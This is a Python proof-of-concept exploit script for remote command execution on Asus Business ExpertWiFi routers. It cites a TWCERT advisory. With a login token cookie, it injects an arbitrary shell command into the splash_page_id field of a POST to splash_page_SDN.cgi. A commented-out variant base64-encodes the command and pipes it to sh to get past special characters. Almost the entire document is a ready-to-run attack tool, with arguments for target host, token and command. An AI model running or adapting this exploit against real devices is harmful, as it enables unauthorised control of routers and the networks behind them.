#!/usr/bin/env python3
# Author: zoeyphoscy
# References:
#  https://www.twcert.org.tw/tw/cp-132-7737-1acd0-1.html
# TODO: 
#  Add ssl support

import argparse
import requests
import re

def exploit(url, token, command):
    cookies = {"asus_token":token}
    payload = f"""Content-Disposition: form-data;name="splash_page_id";\n\ntest="aaaa";{command};"""
    
    #Try uncommenting the following lines if command includes special characters
    #command64 = __import__("base64").b64encode(command.encode()).decode()
    #payload = f"""Content-Disposition: form-data;name="splash_page_id";\n\rtest="aaaa";echo {command64} | base64 -d | sh;"""
    
    req = requests.post(url, cookies=cookies, data=payload)
    

def main():
    parser = argparse.ArgumentParser(description="PoC script for Asus Business ExpertWiFi RCE")
    parser.add_argument("--host", required=True, help="Hostname of the target")
    parser.add_argument("--token", required=True, help="Asus login token")
    parser.add_argument("--port", required=False, help="Port number of the host, only required if non-default")
    parser.add_argument("command", help="Your arbitrary command")

    args = parser.parse_args()
    host = args.host

    if args.port:
        host = args.host + ":" + args.port
    
    url = "http://" + host + "/splash_page_SDN.cgi"
    
    exploit(url, args.token, args.command)

main()